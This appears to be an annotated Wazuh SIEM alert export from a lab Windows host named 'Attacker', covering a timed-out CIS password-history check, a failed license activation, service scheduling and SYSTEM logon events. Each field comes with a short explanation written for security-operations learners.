data.sca.check.description:  This policy setting determines the number of renewed, unique passwords that have to be associated with a user account before you can reuse an old password. The value for this policy setting must be between 0 and 24 passwords. The default value for Windows Vista is 0 passwords, but the default setting in a domain is 24 passwords. To maintain the effectiveness of this policy setting, use the Minimum password age setting to prevent users from repeatedly changing their password. The recommended state for this setting is: 24 or more password(s). Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Note #2: As of the publication of this benchmark, Microsoft currently has a maximum limit of 24 saved passwords. For more information, please visit Enforce password history (Windows 10) - Windows security | Microsoft Docs
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The longer a user uses the same password, the greater the chance that an attacker can determine the password through brute force attacks. Also, any accounts that may have been compromised will remain exploitable for as long as the password is left unchanged. If password changes are required but password reuse is not prevented, or if users continually reuse a small number of passwords, the effectiveness of a good password policy is greatly reduced. If you specify a low number for this policy setting, users will be able to use the same small number of passwords repeatedly. If you do not also configure the Minimum password age setting, users might repeatedly change their passwords until they can reuse their original password.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 24 or more password(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Enforce password history
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.1
CIS Benchmark recommendation number this single check implements (same value as rule.cis).

data.sca.check.compliance.cis_csc:  5.2
CIS Critical Security Control this check supports (same value as rule.cis_csc).

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
passed, failed, or not applicable. Red = needs fixing. Not applicable means the check could not be evaluated, so it is not a pass – read data.sca.check.reason before closing it.

data.sca.check.reason:  Timeout overtaken running command 'net.exe accounts'
Why the scanner gave that result. Here the test command timed out, so the control's real state is unknown and the previous 'failed' has not been shown to be fixed.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:21.417+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:21.417+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533881.42181
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
Windows event provider (ETW source) that wrote the event. Always pair it with eventID when looking up meaning – IDs are only unique per provider.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
GUID of that provider – stable across renames and language packs, handy in event subscription filters.

data.win.system.eventSourceName:  Software Protection Platform Service
Legacy event‑log source name registered by the application – what older tooling shows as 'Source'.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
Schema version of the event payload – check it when eventdata fields differ between Windows builds.

data.win.system.level:  2
Numeric Windows level (1 = Critical, 2 = Error, 3 = Warning, 4 = Information, 5 = Verbose); severityValue below is the same thing as text.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:43.0293769Z
When the event was written on the endpoint (UTC). Here it is a week earlier than the alert timestamp, so this event was collected late rather than generated now.

data.win.system.eventRecordID:  2351
Incremental log record number – handy for timeline order.

data.win.system.processID:  9692
PID of the process that logged the event – pivot to process‑creation events for the same PID, remembering PIDs are reused after a reboot.

data.win.system.threadID:  0
Thread that logged the event – rarely useful outside deep forensics.

data.win.system.channel:  Application
Event log channel the event lives in (Application, System, Security, or a provider‑specific Operational log).

data.win.system.computer:  Attacker
Hostname recorded by Windows itself – should match agent.name; a mismatch suggests forwarded or replayed events.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable"
Rendered message text for the event. Read it for the error code and arguments – it is the same content as eventdata in human form.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable
Raw parameter string the provider logged – the machine‑readable version of message.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:21.928+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:21.928+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533881.44501
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:04.3626123Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43449
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:22.030+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:22.030+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533882.51836
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:38:35.2666112Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2353
Incremental log record number – handy for timeline order.

data.win.system.processID:  13324
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:36:35Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-18T16:36:35Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:22.317+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:22.317+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533882.53416
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:37:05.5675781Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43451
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:22.869+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:22.869+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533882.60751
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:43:41.5201262Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2355
Incremental log record number – handy for timeline order.

data.win.system.processID:  10268
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:36:41Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-18T16:36:41Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:23.837+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:23.837+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
